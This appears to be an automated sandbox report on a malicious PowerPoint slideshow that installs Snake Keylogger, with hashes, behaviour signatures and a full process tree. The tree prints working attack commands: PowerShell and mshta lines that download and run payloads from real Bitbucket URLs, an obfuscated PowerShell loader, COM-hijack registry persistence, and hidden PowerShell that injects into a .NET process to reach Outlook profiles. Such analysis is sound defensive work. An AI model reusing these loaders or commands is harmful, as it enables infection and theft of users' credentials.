Analysis
-
max time kernel
1712s -
max time network
1755s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
30-09-2022 23:49
General
-
Target
ae4932402776b79b18dac096d0afdcc986f7bef1459bfb9bb5675f2b074d8e04.pps
-
Size
102KB
-
MD5
b47c0f0957935cfc3c27337b8f117d75
-
SHA1
1228ae88cfc7a2a80506cd2e4fb14f22a5f8d76c
-
SHA256
ae4932402776b79b18dac096d0afdcc986f7bef1459bfb9bb5675f2b074d8e04
-
SHA512
208edf3bf8dfb38d738a86db7a240c0ad985ed14b8f58435bcd945d4ca7904469c60bdcb3fb53f91d9f8d91d47c68b5ef26941b44cdb986959cc9e59e907e50e
-
SSDEEP
768:kf9BcTRDkSIOd0Xg4JbvsyEVK3/L1U82cY3/A5jEcjo:kutY1OmvsyEVKvL1U0WA5js
Malware Config
Extracted
https://bitbucket.org/!api/2.0/snippets/tinypro/rEG58e/000e903c314ad0a34dfaac0751c43024bbf2dadd/files/blessed2.txt
Signatures
-
Process spawned unexpected child process 12 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 10 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Registers COM server for autorun 1 TTPs 20 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 30 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 10 IoCs
-
Suspicious use of SetThreadContext 10 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 40 IoCs
-
Modifies registry key 1 TTPs 20 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 59 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\ae4932402776b79b18dac096d0afdcc986f7bef1459bfb9bb5675f2b074d8e04.pps" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c start /min PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/tinypro/LM4xGp/ed8727ba02924677655de204f9422df557005d3f/files/blessed-final.txt') -useB); Start-Sleep -Seconds 202⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/tinypro/LM4xGp/ed8727ba02924677655de204f9422df557005d3f/files/blessed-final.txt') -useB); Start-Sleep -Seconds 203⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /min mshta https://bitbucket.org/!api/2.0/snippets/tinypro/rEG58e/000e903c314ad0a34dfaac0751c43024bbf2dadd/files/blessed2.txt4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta https://bitbucket.org/!api/2.0/snippets/tinypro/rEG58e/000e903c314ad0a34dfaac0751c43024bbf2dadd/files/blessed2.txt5⤵
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HPJSWDLAZGWFDZYDFHWGFRU = '[%9%{!)<60%7]643]%((!^]y%9%{!)<60%7]643]%((!^]t\+!{{@901}8-#+([)]#/=}&{0}#23{1=##<%9-+90*4+.IO.%9%{!)<60%7]643]%((!^]t{)]<5/]9928(@-%*})\<$@\+!{{@901}8-#+([)]#/=}_#=#9)<+/&53\+]}70#-*6&{0}#23{1=##<%9-+90*4+{)]<5/]9928(@-%*})\<$@\+!{{@901}8-#+([)]#/=}_#=#9)<+/&53\+]}70#-*6d\+!{{@901}8-#+([)]#/=}{)]<5/]9928(@-%*})\<$@]'.Replace('%9%{!)<60%7]643]%((!^]','S').Replace('\+!{{@901}8-#+([)]#/=}','E').Replace('{)]<5/]9928(@-%*})\<$@','R').Replace('_#=#9)<+/&53\+]}70#-*6','A').Replace('&{0}#23{1=##<%9-+90*4+','M');$HFVVYPXEVBJEIVAVHEPLSDU = ($HPJSWDLAZGWFDZYDFHWGFRU -Join '')|&('I'+'EX');$HKLNYCJAXBTERCXRLWVDDRR = '[$0[-_<#)(+}%]\3%7\(5&#y$0[-_<#)(+}%]\3%7\(5&#*^(!+72@//61)!18$/<%8[+&=#*$)4$<3}!1<)@3##5=m.N+&=#*$)4$<3}!1<)@3##5=*^(!+72@//61)!18$/<%8[.W+&=#*$)4$<3}!1<)@3##5=bR+&=#*$)4$<3}!1<)@3##5=qu+&=#*$)4$<3}!1<)@3##5=$0[-_<#)(+}%]\3%7\(5&#*^(!+72@//61)!18$/<%8[]'.Replace('$0[-_<#)(+}%]\3%7\(5&#','S').Replace('+&=#*$)4$<3}!1<)@3##5=','E').Replace('*^(!+72@//61)!18$/<%8[','T');$HHKOVSNBTTKFPLKUTNGTEHB = ($HKLNYCJAXBTERCXRLWVDDRR -Join '')|&('I'+'EX');$HTZCELDOJQNRIVJVBXAVZND = '\][0{2=!#**(#<)4$/{=^%r11+[/-}*(1}3(}]+(#)6[]a<!=7!}\7)9&$[[)/4/&[/&11+[/-}*(1}3(}]+(#)6[]'.Replace('\][0{2=!#**(#<)4$/{=^%','C').Replace('11+[/-}*(1}3(}]+(#)6[]','E').Replace('<!=7!}\7)9&$[[)/4/&[/&','T');$HJJPDTCBEJQGGUGWFGICSKF = '{!@{8=!@4!(52!5=$1_##*&5<22_0_)1\%*#}*(6[867tR&5<22_0_)1\%*#}*(6[867[={9}@&&6*48{8}6_+3%=*pon[={9}@&&6*48{8}6_+3%=*&5<22_0_)1\%*#}*(6[867'.Replace('{!@{8=!@4!(52!5=$1_##*','G').Replace('&5<22_0_)1\%*#}*(6[867','E').Replace('[={9}@&&6*48{8}6_+3%=*','S');$HYRGAIQZLYZNHUPAAKKHBKR = 'G!!((=#^55=^9&7^3$_4=1/t[%\*\][6!)-[8$5!41<#1_!!((=#^55=^9&7^3$_4=1/7({=\[#%*6@0088{}\43}@pon7({=\[#%*6@0088{}\43}@!!((=#^55=^9&7^3$_4=1/7({=\[#%*6@0088{}\43}@t[%\*\][6!)-[8$5!41<#1_!!((=#^55=^9&7^3$_4=1/am'.Replace('7({=\[#%*6@0088{}\43}@','S').Replace('!!((=#^55=^9&7^3$_4=1/','E').Replace('[%\*\][6!)-[8$5!41<#1_','R');$HSIYIVTRGVUTCUUELHVIWZX = '}2=29-^$/4!#%4_6^(9<@[&_/2\4*4=(\7_]}](4_\_)a^[<2_/^@429<&238}@][#=To&_/2\4*4=(\7_]}](4_\_)n^[<2_/^@429<&238}@][#='.Replace('}2=29-^$/4!#%4_6^(9<@[','R').Replace('&_/2\4*4=(\7_]}](4_\_)','E').Replace('^[<2_/^@429<&238}@][#=','D');&('I'+'EX')($HFVVYPXEVBJEIVAVHEPLSDU::new($HHKOVSNBTTKFPLKUTNGTEHB::$HTZCELDOJQNRIVJVBXAVZND('https://bitbucket.org/!api/2.0/snippets/tinypro/AMyBo5/7aa8070fad88ee97f746dc619bfe09d8d55d7840/files/blessed1.txt').$HJJPDTCBEJQGGUGWFGICSKF().$HYRGAIQZLYZNHUPAAKKHBKR()).$HSIYIVTRGVUTCUUELHVIWZX())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.ps1'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.vbs"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -noProfilE -ExEcutionPolicy Bypass -Command C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -noProfilE -ExEcutionPolicy Bypass -Command C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -noProfilE -ExEcutionPolicy Bypass -Command C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -noProfilE -ExEcutionPolicy Bypass -Command C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat""2⤵
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f1⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -noProfilE -ExEcutionPolicy Bypass -Command C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat""2⤵
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -noProfilE -ExEcutionPolicy Bypass -Command C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat""2⤵
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -noProfilE -ExEcutionPolicy Bypass -Command C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat""2⤵
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -noProfilE -ExEcutionPolicy Bypass -Command C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat""2⤵
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
- Drops file in System32 directory
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -noProfilE -ExEcutionPolicy Bypass -Command C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat""2⤵
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -noProfilE -ExEcutionPolicy Bypass -Command C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat""2⤵
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1Filesize
531KB
MD5cf926b0be724d46e228175953d33a988
SHA14b87320b4a3b75be7414f82e3cc83abed0f2123b
SHA2563a0b71b1c003590b1eb5a0f5e5e1ccf5af14fca8a264ff1f01c153c2a3806e00
